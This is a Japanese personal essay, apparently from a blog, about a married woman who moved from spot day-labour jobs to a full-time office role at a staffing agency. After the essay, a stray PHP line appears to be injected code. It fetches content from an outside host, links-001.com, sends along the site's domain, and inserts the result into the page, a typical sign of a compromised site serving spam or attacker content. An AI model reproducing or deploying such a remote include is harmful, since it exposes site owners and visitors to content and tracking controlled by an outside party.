前へ
次へ

スポット派遣をきっかけに人材派遣会社へ

私は今人材派遣会社で働いています。
人を派遣する方ですね。
きっかけはスポット派遣を利用したこと。
簡単に言ってしまえば1日ごとの日雇いのようなものです。
結婚をきっかけに引っ越しするため退職したのですが、家にいるのはどうしても暇で。
そこで気まぐれにスポットのお仕事を3回ほどしました。
物流倉庫が2回、コールセンターが1回ですね。
久しぶりに働いて本当に楽しかったのを覚えています。
特に物流倉庫のお仕事はずっと事務職だったこともあり、新鮮ですごく楽しかったです。
この時派遣会社の方と仲良くなったのですが、内勤が人手不足だからアルバイトに来ないかと誘われました。
それが最初のきっかけですね。
最初は扶養内でのアルバイトから始め、派遣スタッフさんへの電話連絡や日払いの対応、登録会の対応などを行っていました。
正直営業や挨拶など取引先に行くこと以外は正社員の方と変わりません。
完全に内勤だけの正社員の方も多いです。
それに、派遣スタッフさんと接するのがすごく楽しくて。
自分にはとても合った会社だと思いました。
それから正社員になりたいと思うようになっていったんです。
私の場合は結婚していますので、主人とは何度も相談をしました。
主人は賛成してくれていたのですが、二人とも家事があまり得意な方ではありません。
そのため、フルタイムでの共働きになってうまくやっていけるのかどうかシミュレーションもしました。
そして、改めて人材派遣会社で正社員になることを決めたんです。
今はアルバイト時代とそこまで大きく仕事内容が変わったわけではないのですが、より深くスタッフさんに関わるようになりました。
例えば相談をされることも多いため、面談なども行っています。
派遣先との相性や働き方など、働いていると色々な不満や不安なことが出てきますよね。
そのため、気持ちをしっかりとくみ取れるように丁寧なヒアリングを行うようにしています。
楽しく働けていると聞くと、私もハッピーな気持ちになりますね。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top